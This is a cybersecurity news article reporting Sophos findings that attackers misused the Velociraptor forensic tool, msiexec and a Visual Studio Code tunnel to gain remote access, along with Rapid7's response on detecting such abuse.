Red Hot Cyber, The cybersecurity news

Red Hot Cyber

Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.
Select language
Spanish Italian
Search

Attackers are using Velociraptor for cyberattacks. Rapid7 is aware

Redazione RHC : 5 September 2025 12:30

Sophos security specialists have drawn attention to a cyberattack in which unknown attackers used the open-source forensic tool Velociraptor to monitor endpoints.

“In this incident, attackers used a tool to download and run Visual Studio Code with the likely intent of creating a tunnel to a command-and-control server,” Sophos Counter Threat experts said. Unit.

The report emphasizes that attackers often employ “living-off-the-land” (LotL) tactics and use legitimate remote monitoring and control tools in attacks, but the use of Velociraptor signals an evolution of such tactics, where incident response software is being misused for malicious purposes.

Analysis of the incident showed that the attackers used the Windows msiexec utility to download an MSI installer from the Cloudflare Workers domain, which also serves as a staging area for other solutions used by attackers, including the Cloudflare tunneling tool and the Cloudflare Remote Administration Utility. Radmin.

The MSI file was designed to deploy Velociraptor, which would then communicate with another Cloudflare Workers domain. The access was then used to download Visual Studio Code from the same staging server using an encoded PowerShell command and run it with the tunneling option enabled to allow both remote access and remote code execution.

Additionally, the attackers were observed reusing the Windows msiexec utility to download additional payloads. “Organizations should monitor and investigate unauthorized use of Velociraptor and consider the use of such tactics as a precursor to ransomware distribution,” Sophos warns.

Following Sophos’s publication of this report, security firm Rapid7, which develops Velociraptor, published a white paper that details how organizations can detect Velociraptor misuse in their environments.

“Rapid7 is aware of reports of abuse of the open-source incident response tool Velociraptor. Velociraptor is widely used by defenders for legitimate digital forensics and incident response purposes. But like many other security and administrative tools, it can be used for malicious purposes if it falls into the wrong hands,” the developers comment.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.

Lista degli articoli